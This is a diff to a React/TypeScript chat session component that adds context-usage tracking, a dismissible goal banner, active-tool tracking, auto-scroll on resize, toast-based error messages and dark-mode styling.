   const [actionMessageId, setActionMessageId] = useState<string | null>(null);
+  const [contextUsageSnapshot, setContextUsageSnapshot] = useState<ContextUsageSnapshot | null>(null);
+  const [contextUsageRefreshing, setContextUsageRefreshing] = useState(false);
+  const [contextUsageWindowTokens, setContextUsageWindowTokens] = useState(0);
+  const contextUsageRequestRef = useRef<{ sessionId: string; promise: Promise<void> } | null>(null);
+  const contextUsageRequestSeqRef = useRef(0);
+  const lastContextUsagePushAtRef = useRef(0);
   const isCompactingRef = useRef(false);
   const prevStreamingRef = useRef(false);
   // Tracks "sessionId::message" key to prevent double-send in React StrictMode
   const initialMessageSentRef = useRef('');
   const abortingRef = useRef(false);
   const sessionBusyRef = useRef(false);
+  const goalHydrationVersionRef = useRef(0);
   // ID of the assistant message that was aborted; used to ignore its finish event
   const abortedMessageIdRef = useRef<string | null>(null);
   const statusCheckedRef = useRef<string | null>(null);
@@ -957,6 +1535,7 @@ export default function SessionChat({
     clearAll: clearPendingQuestions,
   } = usePendingQuestions();
   const messagesEndRef = useRef<HTMLDivElement>(null);
+  const messagesContentRef = useRef<HTMLDivElement>(null);
   const scrollContainerRef = useRef<HTMLDivElement>(null);
   const isAtBottomRef = useRef(true);
   const textareaRef = useRef<HTMLTextAreaElement>(null);
@@ -1028,17 +1607,24 @@ export default function SessionChat({
     truncateAfterMessage,
   } =
     useSessionMessages(sessionId || undefined);
-  const estimatedContextTokens = useMemo(
-    () => estimateContextTokens(messages, input),
-    [messages, input],
+  const contextUsageMessages = contextUsageRefreshing && !contextUsageSnapshot ? [] : messages;
+  const contextUsageBreakdown = useMemo(
+    () => buildContextUsageBreakdown(contextUsageMessages, input, contextUsageSnapshot),
+    [contextUsageMessages, input, contextUsageSnapshot],
   );
-  const contextUsagePercent = contextWindowTokens && contextWindowTokens > 0
-    ? Math.min(100, Math.round((estimatedContextTokens / contextWindowTokens) * 100))
+  const estimatedContextTokens = contextUsageBreakdown.usedTokens;
+  const resolvedContextWindowTokens = contextUsageSnapshot?.contextWindow && contextUsageSnapshot.contextWindow > 0
+    ? contextUsageSnapshot.contextWindow
+    : contextUsageWindowTokens > 0
+      ? contextUsageWindowTokens
+    : (contextWindowTokens || 0);
+  const contextUsagePercent = resolvedContextWindowTokens > 0
+    ? Math.min(100, Math.round((estimatedContextTokens / resolvedContextWindowTokens) * 100))
     : 0;
-  const contextUsageTitle = contextWindowTokens && contextWindowTokens > 0
+  const contextUsageTitle = resolvedContextWindowTokens > 0
     ? t('chat.contextUsageTitle', {
         used: formatTokenCount(estimatedContextTokens),
-        total: formatTokenCount(contextWindowTokens),
+        total: formatTokenCount(resolvedContextWindowTokens),
         percent: contextUsagePercent,
       })
     : t('chat.contextUsageUnknown');
@@ -1064,6 +1650,85 @@ export default function SessionChat({
     }
   }, [sessionId]);
 
+  // Fetches the context-usage snapshot for the current session. `clear` drops the cached snapshot and forces a new
+  // request; `skipIfFreshMs` skips the fetch when the last-push timestamp is more recent than that many milliseconds.
+  const refreshContextUsage = useCallback((options?: { clear?: boolean; skipIfFreshMs?: number }) => {
+    if (!sessionId) {
+      setContextUsageSnapshot(null);
+      setContextUsageRefreshing(false);
+      setContextUsageWindowTokens(0);
+      contextUsageRequestSeqRef.current += 1;
+      contextUsageRequestRef.current = null;
+      lastContextUsagePushAtRef.current = 0;
+      return;
+    }
+    if (options?.clear) {
+      setContextUsageSnapshot(null);
+      setContextUsageRefreshing(true);
+      contextUsageRequestSeqRef.current += 1;
+      contextUsageRequestRef.current = null;
+      lastContextUsagePushAtRef.current = 0;
+    } else if (options?.skipIfFreshMs && Date.now() - lastContextUsagePushAtRef.current < options.skipIfFreshMs) {
+      return;
+    }
+
+    const existingRequest = contextUsageRequestRef.current;
+    if (existingRequest?.sessionId === sessionId) return existingRequest.promise;
+
+    const requestSessionId = sessionId;
+    const requestSeq = contextUsageRequestSeqRef.current;
+    const request = sessionApi.getContextUsage(requestSessionId).then((snapshot) => {
+      if (requestSeq === contextUsageRequestSeqRef.current && snapshot.sessionID === sessionId) {
+        setContextUsageSnapshot(snapshot);
+        if (snapshot.contextWindow && snapshot.contextWindow > 0) {
+          setContextUsageWindowTokens(snapshot.contextWindow);
+        }
+        setContextUsageRefreshing(false);
+      }
+    }).catch((err) => {
+      // A superseded request must not clear the flag while the request that replaced it is still in flight.
+      if (requestSeq === contextUsageRequestSeqRef.current) {
+        setContextUsageRefreshing(false);
+      }
+      console.warn('[SessionChat] Failed to fetch context usage:', err);
+    }).finally(() => {
+      if (contextUsageRequestRef.current?.promise === request) {
+        contextUsageRequestRef.current = null;
+      }
+    });
+    contextUsageRequestRef.current = { sessionId: requestSessionId, promise: request };
+    return request;
+  }, [sessionId]);
+
+  useEffect(() => {
+    void refreshContextUsage({ clear: true });
+  }, [refreshContextUsage]);
+
+  useEffect(() => {
+    goalHydrationVersionRef.current += 1;
+    const hydrationVersion = goalHydrationVersionRef.current;
+
+    if (!sessionId) {
+      setGoalBanner(null);
+      setDismissedGoalKey('');
+      return;
+    }
+
+    setGoalBanner(null);
+    setDismissedGoalKey(readDismissedGoalKey(sessionId));
+
+    sessionApi.get(sessionId).then((session) => {
+      if (goalHydrationVersionRef.current !== hydrationVersion) return;
+      setGoalBanner(toGoalBannerState(session.goal));
+      setDismissedGoalKey(readDismissedGoalKey(sessionId));
+    }).catch((err) => {
+      if (goalHydrationVersionRef.current !== hydrationVersion) return;
+      setGoalBanner(null);
+      setDismissedGoalKey(readDismissedGoalKey(sessionId));
+      console.warn('[SessionChat] Failed to fetch session goal:', err);
+    });
+  }, [sessionId]);
+
   const handleSSEEvent = useCallback(
     (event: SSEChatEvent) => {
       const { type, properties } = event;
@@ -1077,9 +1742,16 @@ export default function SessionChat({
       if (type === 'session.cleared' && properties.sessionID === sessionId) {
         abortingRef.current = false;
         sessionBusyRef.current = false;
+        activeToolPartIdsRef.current.clear();
         abortedMessageIdRef.current = null;
+        setContextUsageSnapshot(null);
+        setContextUsageRefreshing(true);
+        setContextUsageWindowTokens(0);
         setIsStreaming(false);
+        setGoalBanner(null);
+        setDismissedGoalKey('');
         refetch();
+        void refreshContextUsage({ clear: true });
       } else if (
         (type === 'session.status' && properties.sessionID === sessionId)
         || (type === 'session.updated' && properties.id === sessionId && properties.status === 'idle')
@@ -1101,12 +1773,14 @@ export default function SessionChat({
           setCompactionStages([]);
         } else if (statusType === 'idle') {
           sessionBusyRef.current = false;
+          activeToolPartIdsRef.current.clear();
           setIsStreaming(false);
           setIsCompacting(false);
           isCompactingRef.current = false;
           setCompactingMessage('');
           setCompactionStages([]);
           refetch();
+          void refreshContextUsage({ skipIfFreshMs: 500 });
         }
       } else if (type === 'message.updated' && properties.info?.sessionID === sessionId) {
         updateMessage(properties.info);
@@ -1120,10 +1794,11 @@ export default function SessionChat({
           // would replace the visible partial response with an empty message.
           if (shouldRefetch) {
             refetch();
-            if (!sessionBusyRef.current) {
+            if (!sessionBusyRef.current && activeToolPartIdsRef.current.size === 0) {
               setIsStreaming(false);
             }
           }
+          void refreshContextUsage();
           abortingRef.current = false;
           abortedMessageIdRef.current = null;
         } else if (
@@ -1134,6 +1809,15 @@ export default function SessionChat({
           setIsStreaming(true);
         }
       } else if (type === 'message.part.updated' && properties.part?.sessionID === sessionId) {
+        const part = properties.part as Pick<MessagePart, 'id' | 'type' | 'state'>;
+        if (part.id) {
+          if (isActiveToolPart(part)) {
+            activeToolPartIdsRef.current.add(part.id);
+            if (!abortingRef.current) setIsStreaming(true);
+          } else {
+            activeToolPartIdsRef.current.delete(part.id);
+          }
+        }
         updateMessagePart(properties.part, properties.delta);
         scrollToBottom();
       } else if (type === 'question.asked' && properties.sessionID === sessionId) {
@@ -1155,6 +1839,9 @@ export default function SessionChat({
         const stage = properties.stage as CompactionStage | undefined;
         const data = (properties.data ?? {}) as Record<string, unknown>;
         if (!stage) return;
+        if (stage === 'complete' && data.result === 'continue') {
+          void refreshContextUsage({ skipIfFreshMs: 500 });
+        }
         // Single source of truth: append into ``compactionStages`` and let
         // the progress bar derive ``done/total`` from it via useMemo.
         // ``chunk_done`` arrives in non-deterministic order under
@@ -1175,12 +1862,33 @@ export default function SessionChat({
         const items = Array.isArray(properties.items) ? properties.items : [];
         setQueuedPrompts(items as QueuedPrompt[]);
         if (items.length > 0) setQueueExpanded(true);
+      } else if (type === 'session.goal.updated' && properties.sessionID === sessionId) {
+        const nextGoal = toGoalBannerState(properties as SessionGoalState);
+        if (nextGoal) {
+          goalHydrationVersionRef.current += 1;
+          setGoalBanner(nextGoal);
+          setDismissedGoalKey(readDismissedGoalKey(sessionId));
+        }
+      } else if (type === 'context.compacted' && properties.sessionID === sessionId) {
+        void refreshContextUsage({ skipIfFreshMs: 500 });
+      } else if (type === 'context.usage.updated' && properties.sessionID === sessionId) {
+        setContextUsageSnapshot(properties as ContextUsageSnapshot);
+        if (typeof properties.contextWindow === 'number' && properties.contextWindow > 0) {
+          setContextUsageWindowTokens(properties.contextWindow);
+        }
+        contextUsageRequestSeqRef.current += 1;
+        contextUsageRequestRef.current = null;
+        lastContextUsagePushAtRef.current = Date.now();
+        setContextUsageRefreshing(false);
       } else if (type === 'session.error' && properties.sessionID === sessionId) {
         setIsStreaming(false);
         setIsCompacting(false);
         setCompactionStages([]);
+        setContextUsageRefreshing(false);
+        void refreshContextUsage({ skipIfFreshMs: 500 });
         abortingRef.current = false;
         sessionBusyRef.current = false;
+        activeToolPartIdsRef.current.clear();
         onError?.(properties.error?.message || t('chat.placeholder'));
       }
     },
@@ -1189,6 +1897,7 @@ export default function SessionChat({
       updateMessage,
       updateMessagePart,
       refetch,
+      refreshContextUsage,
       handleQuestionAsked,
       removeByRequestId,
       onSSEEvent,
@@ -1202,10 +1911,15 @@ export default function SessionChat({
       try {
         await submitAnswer(callID, requestId, answers);
       } catch (err: unknown) {
-        alert(`Submit failed: ${err instanceof Error ? err.message : String(err)}`);
+        const message = err instanceof Error ? err.message : String(err);
+        if (onError) {
+          onError(message);
+        } else {
+          toast.error(t('chat.questionSubmitFailed', 'Submit failed'), message);
+        }
       }
     },
-    [submitAnswer],
+    [onError, submitAnswer, t, toast],
   );
 
   const handleQuestionReject = useCallback(
@@ -1213,10 +1927,15 @@ export default function SessionChat({
       try {
         await submitReject(callID, requestId);
       } catch (err: unknown) {
-        alert(`Cancel failed: ${err instanceof Error ? err.message : String(err)}`);
+        const message = err instanceof Error ? err.message : String(err);
+        if (onError) {
+          onError(message);
+        } else {
+          toast.error(t('chat.questionCancelFailed', 'Cancel failed'), message);
+        }
       }
     },
-    [submitReject],
+    [onError, submitReject, t, toast],
   );
 
   const { status: sseStatus } = useSSE({
@@ -1225,6 +1944,7 @@ export default function SessionChat({
     onReconnect: () => {
       if (!sessionId) return;
       refetch();
+      void refreshContextUsage();
       fetchPromptQueue();
       fetchPendingQuestions(sessionId).catch((err) => {
         console.warn('[SessionChat] Failed to recover pending questions after reconnect:', err);
@@ -1244,6 +1964,18 @@ export default function SessionChat({
     scrollToBottom();
   }, [messages, scrollToBottom]);
 
+  useEffect(() => {
+    if (!isStreaming && !sending && !isCompacting) return;
+    const target = messagesContentRef.current;
+    if (!target || typeof ResizeObserver === 'undefined') return;
+
+    const observer = new ResizeObserver(() => {
+      scrollToBottom();
+    });
+    observer.observe(target);
+    return () => observer.disconnect();
+  }, [isStreaming, sending, isCompacting, scrollToBottom]);
+
   // Auto-resize textarea
   const autoResize = useCallback(() => {
     const el = textareaRef.current;
@@ -1271,10 +2003,13 @@ export default function SessionChat({
     setIsCompacting(false);
     setCompactingMessage('');
     setCompactionStages([]);
+    setGoalBanner(null);
+    setDismissedGoalKey('');
     setQueuedPrompts([]);
     setEditingQueueId(null);
     setEditingQueueText('');
     setQueueActionId(null);
+    setContextUsageWindowTokens(0);
     setMentionRange(null);
     setMentionQuery('');
     setSelectedMentionIndex(0);
@@ -1654,6 +2389,12 @@ export default function SessionChat({
         arguments: args,
         agent: agentName,
       });
+      if (command === 'goal' && args.trim()) {
+        goalHydrationVersionRef.current += 1;
+        writeDismissedGoalKey(sessionId, '');
+        setGoalBanner({ objective: args.trim(), status: 'active' });
+        setDismissedGoalKey('');
+      }
     } catch (err: unknown) {
       setIsStreaming(false);
       const axiosErr = err as any;
@@ -1669,9 +2410,15 @@ export default function SessionChat({
   };
 
   /** Core send logic */
-  const sendText = async (text: string, imageParts: ImagePartData[] = [], agentOverride?: string) => {
+  const sendText = async (
+    text: string,
+    imageParts: ImagePartData[] = [],
+    agentOverride?: string,
+    options?: PromptDisplayOptions,
+  ) => {
     if (!sessionId) return;
     const effectiveAgent = agentOverride || agentName;
+    const visibleText = options?.displayText || text;
     // Clear abort state immediately so SSE events for the new stream are not suppressed
     abortingRef.current = false;
     // Force scroll to bottom when user sends a new message
@@ -1682,7 +2429,7 @@ export default function SessionChat({
 
     const tempId = `temp-${Date.now()}`;
     const tempParts: MessagePart[] = [];
-    if (text) tempParts.push({ id: `${tempId}-text`, type: 'text', text });
+    if (visibleText) tempParts.push({ id: `${tempId}-text`, type: 'text', text: visibleText });
     imageParts.forEach((img, i) => {
       tempParts.push({ id: `${tempId}-img-${i}`, type: 'file', url: img.url, mime: img.mime, filename: img.filename });
     });
@@ -1691,7 +2438,7 @@ export default function SessionChat({
       id: tempId,
       sessionID: sessionId,
       role: 'user',
-      parts: tempParts.length > 0 ? tempParts : [{ id: `${tempId}-part`, type: 'text', text }],
+      parts: tempParts.length > 0 ? tempParts : [{ id: `${tempId}-part`, type: 'text', text: visibleText }],
       timestamp: Date.now(),
       agent: effectiveAgent,
     } as Message);
@@ -1702,6 +2449,7 @@ export default function SessionChat({
       };
       if (effectiveAgent) payload.agent = effectiveAgent;
       if (model) payload.model = model;
+      if (options?.displayText) payload.displayText = options.displayText;
 
       await client.post(`/api/session/${sessionId}/prompt_async`, payload);
     } catch (err: unknown) {
@@ -1722,6 +2470,7 @@ export default function SessionChat({
     text: string,
     imageParts: ImagePartData[] = [],
     agentOverride?: string,
+    options?: PromptDisplayOptions,
   ) => {
     if (!sessionId) return;
     const effectiveAgent = agentOverride || agentName;
@@ -1730,6 +2479,7 @@ export default function SessionChat({
         parts: buildPromptParts(text, imageParts),
         ...(effectiveAgent ? { agent: effectiveAgent } : {}),
         ...(model ? { model } : {}),
+        ...(options?.displayText ? { displayText: options.displayText } : {}),
       });
       await fetchPromptQueue();
       setQueueExpanded(true);
@@ -1744,7 +2494,7 @@ export default function SessionChat({
     }
   };
 
-  const handleComposerPrompt = async (text: string) => {
+  const handleComposerPrompt = async (text: string, options?: PromptDisplayOptions) => {
     const trimmed = text.trim();
     if (!trimmed || sending) return;
 
@@ -1755,7 +2505,7 @@ export default function SessionChat({
 
     if (sessionId && isStreaming) {
       try {
-        await enqueueText(trimmed);
+        await enqueueText(trimmed, [], undefined, options);
       } catch {
         setInput(trimmed);
       }
@@ -1771,7 +2521,7 @@ export default function SessionChat({
       setSending(true);
       try {
         setPendingAgentName(agentName || 'rex');
-        await onCreateAndSend(trimmed, [], agentName);
+        await onCreateAndSend(trimmed, [], agentName, model, options);
       } catch {
         setInput(trimmed);
       } finally {
@@ -1781,7 +2531,7 @@ export default function SessionChat({
     }
 
     try {
-      await sendText(trimmed, [], agentName);
+      await sendText(trimmed, [], agentName, options);
     } catch {
       setInput(trimmed);
     }
@@ -1848,8 +2598,9 @@ export default function SessionChat({
       if (onCreateAndSend) {
         setSending(true);
         try {
-          setPendingAgentName(mentionedAgent || 'rex');
-          await onCreateAndSend(text, imageParts, mentionedAgent || undefined, model);
+          const effectiveAgent = mentionedAgent || agentName;
+          setPendingAgentName(effectiveAgent || 'rex');
+          await onCreateAndSend(text, imageParts, effectiveAgent || undefined, model);
           setAttachments([]);
         } catch {
           // Restore both the text and the attachment list so the user can
@@ -2074,6 +2825,16 @@ export default function SessionChat({
         const msgs: any[] = res.data || [];
         const lastMsg = msgs[msgs.length - 1];
         if (lastMsg?.info?.role === 'assistant' && (lastMsg.info.finish || lastMsg.info.time?.completed)) {
+          const hasFetchedActiveTool = msgs.some((msg) => hasActiveToolPart(msg.parts));
+          if (hasFetchedActiveTool) {
+            return;
+          }
+          activeToolPartIdsRef.current.clear();
+          const statusRes = await client.get('/api/session/status');
+          const status = statusRes.data?.[sessionId];
+          if (isActiveSessionStatus(status)) {
+            return;
+          }
           refetch();
           setIsStreaming(false);
         }
@@ -2212,18 +2973,12 @@ export default function SessionChat({
     }
   }, [editingMessageId, messages, resetEditingState]);
 
-  // ── Merged messages with compaction grouping ──
-  // The compaction divider is rendered at the position of the FIRST
-  // compacted message (not the summary), so it appears before the
-  // preserved messages rather than after them.
-  const { merged, compactedGroupMap, summaryRedirectMap, skipIndices } = useMemo(() => {
+  // ── Merged messages ──
+  // Archived-by-compaction messages stay visible in the UI timeline. The
+  // summary message itself renders as a divider, so multiple compactions
+  // naturally appear as multiple chronological separators.
+  const { merged, skipIndices } = useMemo(() => {
     const merged = mergeConsecutiveAssistantMessages(messages);
-    const compactedGroupMap = new Map<number, MergedMessage[]>();
-    // Maps: first-compacted-index → summary-message-index, so we can
-    // render the summary message at the earlier position.
-    const summaryRedirectMap = new Map<number, number>();
-    const compactedBuffer: MergedMessage[] = [];
-    let firstCompactedIdx = -1;
     const skipIndices = new Set<number>();
 
     for (let idx = 0; idx < merged.length; idx++) {
@@ -2236,44 +2991,27 @@ export default function SessionChat({
         skipIndices.add(idx);
         continue;
       }
-      if (msg.compacted) {
-        if (compactedBuffer.length === 0) firstCompactedIdx = idx;
-        compactedBuffer.push(msg);
-        skipIndices.add(idx);
-      } else if (msg.finish === 'summary' && compactedBuffer.length > 0) {
-        // Render the divider at the first compacted message's position
-        skipIndices.delete(firstCompactedIdx);
-        compactedGroupMap.set(firstCompactedIdx, [...compactedBuffer]);
-        summaryRedirectMap.set(firstCompactedIdx, idx);
-        // Skip the summary at its natural (later) position
-        skipIndices.add(idx);
-        compactedBuffer.length = 0;
-        firstCompactedIdx = -1;
-      }
-    }
-
-    // Orphaned compacted messages (no summary found yet — e.g. compaction
-    // still in progress or summary missed during SSE race).  Un-skip them
-    // so they remain visible rather than silently disappearing.
-    if (compactedBuffer.length > 0) {
-      for (const orphan of compactedBuffer) {
-        const orphanIdx = merged.indexOf(orphan);
-        if (orphanIdx >= 0) skipIndices.delete(orphanIdx);
-      }
-      compactedBuffer.length = 0;
     }
 
-    return { merged, compactedGroupMap, summaryRedirectMap, skipIndices };
+    return { merged, skipIndices };
   }, [messages]);
 
   // ── Styling based on compact mode ──
   const msgAreaClass = compact
-    ? 'relative flex flex-col flex-1 min-h-0 overflow-y-auto bg-gray-50 px-4 py-4'
-    : 'relative flex flex-col flex-1 min-h-0 overflow-y-auto bg-gray-50 py-6';
+    ? 'relative flex flex-col flex-1 min-h-0 overflow-y-auto bg-gray-50 px-4 py-4 dark:bg-zinc-950'
+    : 'relative flex flex-col flex-1 min-h-0 overflow-y-auto bg-gray-50 py-6 dark:bg-zinc-950';
 
   const msgListClass = compact
     ? fullWidth ? 'space-y-3 w-full px-4' : 'space-y-3'
-    : fullWidth ? 'space-y-5 w-full px-5' : 'space-y-5 w-[min(76%,64rem)] mx-auto pl-4 pr-8';
+    : fullWidth ? 'space-y-5 w-full px-5' : 'space-y-5 w-[min(76%,64rem)] mx-auto px-6';
+  const visibleGoalBanner = goalBanner && getGoalBannerKey(goalBanner) !== dismissedGoalKey
+    ? goalBanner
+    : null;
+  const handleDismissGoalBanner = useCallback(() => {
+    const goalKey = getGoalBannerKey(visibleGoalBanner);
+    writeDismissedGoalKey(sessionId, goalKey);
+    setDismissedGoalKey(goalKey);
+  }, [sessionId, visibleGoalBanner]);
 
   return (
     <div className={`flex flex-col min-h-0 ${className}`}>
@@ -2303,27 +3041,26 @@ export default function SessionChat({
             <div className="text-center py-8 text-gray-400 text-sm">{effectiveEmptyText}</div>
           )
         ) : (
-          <div className={msgListClass}>
+          <div ref={messagesContentRef} className={msgListClass}>
             {merged.map((msg, i) => {
               if (skipIndices.has(i)) return null;
-              // If this position is a redirect, render the summary message here
-              const redirectIdx = summaryRedirectMap.get(i);
-              const messageToRender = redirectIdx !== undefined ? merged[redirectIdx] : msg;
               return (
                 <ChatMessageBubble
-                  key={messageToRender.id}
-                  message={messageToRender}
+                  key={msg.id}
+                  message={msg}
                   isActive={
                     isStreaming &&
                     i === merged.length - 1 &&
-                    messageToRender.role === 'assistant' &&
-                    !messageToRender.finish
+                    msg.role === 'assistant' &&
+                    !msg.finish
                   }
                   pendingQuestions={pendingQuestions}
                   onQuestionAnswer={handleQuestionAnswer}
                   onQuestionReject={handleQuestionReject}
                   showActions={showActions}
                   showTimestamp={showTimestamp}
+                  collapseIntermediateSteps={collapseIntermediateSteps}
+                  processGroupsDefaultOpen={processGroupsDefaultOpen}
                   compact={compact}
                   onCopy={handleCopy}
                   editingMessageId={editingMessageId}
@@ -2336,7 +3073,6 @@ export default function SessionChat({
                   onEditSave={handleSaveEditedMessage}
                   onEditSend={handleSendEditedUserMessage}
                   onRegenerate={handleRegenerateMessage}
-                  compactedMessages={compactedGroupMap.get(i)}
                 />
               );
             })}
@@ -2344,20 +3080,20 @@ export default function SessionChat({
             {/* Compacting indicator with live progress stages */}
             {isCompacting && (
               <div className={`group relative ${!compact ? 'w-full' : ''} flex`}>
-                <div className={`flex gap-2.5 ${getMessageGroupClassName({ compact, isUser: false, isEditing: false })}`}>
+                <div className={compact ? `flex gap-2.5 ${getMessageGroupClassName({ compact, isUser: false, isEditing: false })}` : 'flex w-full min-w-0'}>
                   <span
-                    className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 ${
+                    className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 dark:ring-zinc-950 ${
                       compact ? 'w-7 h-7 text-xs' : 'w-8 h-8 text-sm'
-                    }`}
+                    } ${compact ? '' : 'absolute -left-10 top-1'}`}
                   >
                     {formatAgentName(pendingAgentName).charAt(0).toUpperCase()}
                   </span>
                   <div className="flex flex-col items-start flex-1 min-w-0">
                     <div className={`flex items-center gap-2 ${compact ? 'h-7' : 'h-8'}`}>
-                      <span className="text-xs font-semibold text-zinc-700">{formatAgentName(pendingAgentName)}</span>
+                      <span className="text-xs font-semibold text-zinc-700 dark:text-zinc-300">{formatAgentName(pendingAgentName)}</span>
                     </div>
                     <div className="flex flex-col min-w-0 w-full">
-                      <div className={`${compact ? 'max-w-[90%] px-4 py-3 rounded-[20px]' : 'w-full px-5 py-4 rounded-[24px]'} text-sm break-words shadow-sm bg-amber-50 border border-amber-200`}>
+                      <div className={`${compact ? 'w-full max-w-full px-4 py-3 rounded-[20px]' : 'w-full px-5 py-4 rounded-[24px]'} text-sm break-words shadow-sm bg-amber-50 border border-amber-200 dark:border-amber-500/35 dark:bg-amber-950/30 dark:shadow-none`}>
                         <div className="flex items-center gap-2 text-sm text-amber-700">
                           <Loader2 className="w-4 h-4 animate-spin text-amber-500" />
                           <span>{compactingMessage || t('chat.compacting')}</span>
@@ -2402,17 +3138,17 @@ export default function SessionChat({
             {/* Standalone thinking indicator when no incomplete message exists */}
             {(isStreaming || sending) && !isCompacting && !(messages.length > 0 && messages[messages.length - 1].role === 'assistant' && !messages[messages.length - 1].finish) && (
               <div className={`group relative ${!compact ? 'w-full' : ''} flex`}>
-                <div className={`flex gap-2.5 ${getMessageGroupClassName({ compact, isUser: false, isEditing: false })}`}>
+                <div className={compact ? `flex gap-2.5 ${getMessageGroupClassName({ compact, isUser: false, isEditing: false })}` : 'flex w-full min-w-0'}>
                   <span
-                    className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 ${
+                    className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 dark:ring-zinc-950 ${
                       compact ? 'w-7 h-7 text-xs' : 'w-8 h-8 text-sm'
-                    }`}
+                    } ${compact ? '' : 'absolute -left-10 top-1'}`}
                   >
                     {formatAgentName(pendingAgentName).charAt(0).toUpperCase()}
                   </span>
                   <div className="flex flex-col items-start flex-1 min-w-0">
                     <div className={`flex items-center gap-2 ${compact ? 'h-7' : 'h-8'}`}>
-                      <span className="text-xs font-semibold text-zinc-700">{formatAgentName(pendingAgentName)}</span>
+                      <span className="text-xs font-semibold text-zinc-700 dark:text-zinc-300">{formatAgentName(pendingAgentName)}</span>
                     </div>
                     <div className="flex flex-col min-w-0 w-full">
                       <div className={getStandaloneThinkingBubbleClassName(compact)}>
@@ -2432,32 +3168,11 @@ export default function SessionChat({
           </div>
         )}
         <div ref={messagesEndRef} className="h-0 flex-shrink-0" />
-
-        {/* Conversation bottom slot: lives inside the scrollable conversation area. */}
-        {conversationBottomSlot && !hideInput && (
-          <div className="sticky bottom-0 z-10 -mx-1 mt-auto translate-y-4 pt-1 bg-gradient-to-t from-gray-50 via-gray-50/95 to-transparent">
-            <div className={`relative min-w-0 ${!compact ? 'w-[min(76%,64rem)] mx-auto pl-4 pr-8' : ''}`}>
-              {typeof conversationBottomSlot === 'function'
-                ? conversationBottomSlot({
-                  sendPrompt: (text) => { void handleComposerPrompt(text); },
-                  setInput: (text) => {
-                    setInput(text);
-                    requestAnimationFrame(() => textareaRef.current?.focus());
-                  },
-                  focusInput: () => textareaRef.current?.focus(),
-                  sending,
-                  streaming: isStreaming,
-                  sessionId,
-                })
-                : conversationBottomSlot}
-            </div>
-          </div>
-        )}
       </div>
 
       {/* Suggestions — shown before user sends any message */}
       {suggestions && suggestions.length > 0 && !hasUserMessage && !hideInput && (
-        <div className="flex-shrink-0 px-3 pt-2.5 pb-2 border-t border-gray-100 bg-white">
+        <div className="flex-shrink-0 px-3 pt-2.5 pb-2 border-t border-gray-100 bg-white dark:border-zinc-800 dark:bg-zinc-950">
           <div className="flex items-center gap-1.5 mb-2">
             <span className="text-xs font-medium text-gray-400">{t('chat.suggestions')}</span>
           </div>
@@ -2478,8 +3193,33 @@ export default function SessionChat({
 
       {/* Follow-up input */}
       {!hideInput && (
-        <div className={`flex-shrink-0 bg-white ${compact ? 'px-4 py-3' : 'py-4'}`}>
-          <div className={`relative min-w-0 ${!compact ? (fullWidth ? 'w-full px-5' : 'w-[min(76%,64rem)] mx-auto pr-8 pl-[58px]') : ''}`}>
+        <div className={`flex-shrink-0 bg-white ${compact ? 'px-4 py-3' : 'py-4'} dark:bg-zinc-950`}>
+          <div className={`relative min-w-0 ${!compact ? (fullWidth ? 'w-full px-5' : 'w-[min(76%,64rem)] mx-auto px-6') : ''}`}>
+            {conversationBottomSlot && (
+              <div className="mb-2 min-w-0">
+                {typeof conversationBottomSlot === 'function'
+                  ? conversationBottomSlot({
+                    sendPrompt: (text, options) => { void handleComposerPrompt(text, options); },
+                    setInput: (text) => {
+                      setInput(text);
+                      requestAnimationFrame(() => textareaRef.current?.focus());
+                    },
+                    focusInput: () => textareaRef.current?.focus(),
+                    sending,
+                    streaming: isStreaming,
+                    sessionId,
+                    hasMessages: messages.length > 0,
+                  })
+                  : conversationBottomSlot}
+              </div>
+            )}
+            {visibleGoalBanner && (
+              <GoalBanner
+                goal={visibleGoalBanner}
+                t={t}
+                onDismiss={handleDismissGoalBanner}
+              />
+            )}
             <QueuedPromptPanel
               items={queuedPrompts}
               expanded={queueExpanded}
@@ -2530,20 +3270,20 @@ export default function SessionChat({
               onDrop={handleComposerDrop}
               className={`rounded-2xl border transition-all ${
                 isCompacting
-                  ? 'border-amber-200 bg-amber-50/30'
+                  ? 'border-amber-200 bg-amber-50/30 dark:border-amber-500/35 dark:bg-amber-950/25'
                   : isDragOver
-                    ? 'border-sky-300 bg-sky-50/60 ring-4 ring-sky-100'
+                    ? 'border-sky-300 bg-sky-50/60 ring-4 ring-sky-100 dark:border-sky-500/50 dark:bg-sky-950/35 dark:ring-sky-500/10'
                     : isStreaming
-                      ? 'border-zinc-200 bg-zinc-50'
-                      : 'border-zinc-200 bg-zinc-50 hover:border-zinc-300 focus-within:border-zinc-300 focus-within:bg-white focus-within:ring-4 focus-within:ring-zinc-100'
+                      ? 'border-zinc-200 bg-zinc-50 dark:border-zinc-800 dark:bg-zinc-900/70'
+                      : 'border-zinc-200 bg-zinc-50 hover:border-zinc-300 focus-within:border-zinc-300 focus-within:bg-white focus-within:ring-4 focus-within:ring-zinc-100 dark:border-zinc-800 dark:bg-zinc-900/70 dark:hover:border-zinc-700 dark:focus-within:border-zinc-700 dark:focus-within:bg-zinc-900 dark:focus-within:ring-zinc-800/60'
               }`}
             >
                 {/* Node reference chip */}
                 {nodeRef && (
                   <div className="flex items-center gap-1.5 px-3 pt-2.5 pb-1">
                     <span className="w-1.5 h-1.5 rounded-full bg-slate-400 flex-shrink-0" />
-                    <code className="text-[11px] font-mono font-semibold text-slate-700 truncate flex-1">{nodeRef.id}</code>
-                    <span className="text-[10px] text-slate-400 flex-shrink-0">{nodeRef.type}</span>
+                    <code className="text-[11px] font-mono font-semibold text-slate-700 truncate flex-1 dark:text-slate-200">{nodeRef.id}</code>
+                    <span className="text-[10px] text-slate-400 flex-shrink-0 dark:text-slate-500">{nodeRef.type}</span>
                     {onNodeRefDismiss && (
                       <button
                         onClick={onNodeRefDismiss}
@@ -2570,7 +3310,7 @@ export default function SessionChat({
                           <div
                             key={attachment.id}
                             className={`relative flex-shrink-0 rounded-lg border overflow-hidden ${
-                              isUploading ? 'border-sky-200 bg-sky-50' : 'border-gray-200 bg-gray-50'
+                              isUploading ? 'border-sky-200 bg-sky-50 dark:border-sky-500/35 dark:bg-sky-950/30' : 'border-gray-200 bg-gray-50 dark:border-zinc-800 dark:bg-zinc-900'
                             }`}
                           >
                             {isUploading ? (
